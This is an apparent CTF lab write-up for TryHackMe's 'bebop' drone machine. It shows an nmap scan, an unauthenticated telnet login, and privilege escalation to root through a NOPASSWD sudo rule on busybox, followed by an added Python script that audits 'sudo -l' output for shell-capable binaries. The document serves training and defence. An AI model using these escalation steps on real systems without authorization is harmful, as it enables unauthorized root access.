bebop | drone lovers CTF
Hello everyone. Today's CTF is available at www.Tryhackme.com and is rated as an easy challenge, so it won't be hard for someone just starting in the field. The concept is based on the Parrot Bebop drone and draws a lot of inspiration from the DEFCON 23 talk "Knocking my neighbour's kids cruddy drone offline". Feel free to check it out; the talk carries a lot of good information.
Let's start with some enumeration:
root@kali:~# nmap -sC -sV 10.10.116.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 17:15 UTC
Nmap scan report for ip-10-10-116-147.eu-west-1.compute.internal (10.10.116.147)
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey:
| 2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
| 256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_ 256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open telnet BSD-derived telnetd
MAC Address: 02:17:77:E9:CA:4E (Unknown)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.64 seconds
root@kali:~#
Telnet to the machine. No credentials are needed, and the username is provided in the challenge.
root@kali:~# telnet 10.10.116.147
Trying 10.10.116.147...
Connected to 10.10.116.147.
Escape character is '^]'.
login: pilot
Last login: Sat Oct 5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr 4 02:07:22 UTC 2019
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
You can use "pkg info" to see a list of packages you have installed.
[pilot@freebsd ~]$
The user flag is in the pilot user's home directory.
[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt
THM{r3mxxxxxxxxxxxxxxxxx}
[pilot@freebsd ~]$
Privilege escalation
[pilot@freebsd /]$ sudo -l
User pilot may run the following commands on freebsd:
(root) NOPASSWD: /usr/local/bin/busybox
[pilot@freebsd /]$ sudo /usr/local/bin/busybox sh
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
#
And that's it, a very quick and tasty machine to exploit.
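From the defender's side, the sudo rule above is the whole problem: busybox is a multi-call binary that includes sh, so a NOPASSWD rule for it is the same as handing out a root shell. The following audit script is an added example, not part of the original challenge or write-up; it parses `sudo -l` output and flags rules of that kind. The SHELL_CAPABLE list and the second sample rule are assumptions made for the example.

```python
import os
import re

# Binaries that can hand the caller a shell when run through sudo. Assumed,
# non-exhaustive list for this example; busybox is the one seen on this box.
SHELL_CAPABLE = {"busybox", "sh", "bash", "csh", "tcsh", "zsh", "ksh", "env"}

# Matches a `sudo -l` rule line such as "(root) NOPASSWD: /usr/local/bin/busybox"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_listing(text):
    """Return a list of findings (dicts) for risky rules in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header line or anything that is not a rule
        runas = m.group("runas")
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        # Commands in one rule are comma separated (escaped commas not handled).
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0]
            name = os.path.basename(binary)
            reasons = []
            if binary == "ALL":
                reasons.append("unrestricted command set")
            elif name in SHELL_CAPABLE:
                reasons.append(f"{name} can start a shell as {runas}")
            if reasons and "NOPASSWD" in tags:
                reasons.append("no password required")
            if reasons:
                findings.append(
                    {"runas": runas, "command": cmd, "reasons": reasons})
    return findings

# The listing from the write-up, plus one constructed benign rule for contrast.
SAMPLE = """User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
    (root) /usr/sbin/service sshd restart
"""

if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE):
        print(f"{f['command']} as {f['runas']}: {'; '.join(f['reasons'])}")
```

A finding for a multi-call binary such as busybox means the rule is effectively full root access; the fix is to remove the rule or replace it with one for the single purpose-built command the user actually needs.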
Happy Hacking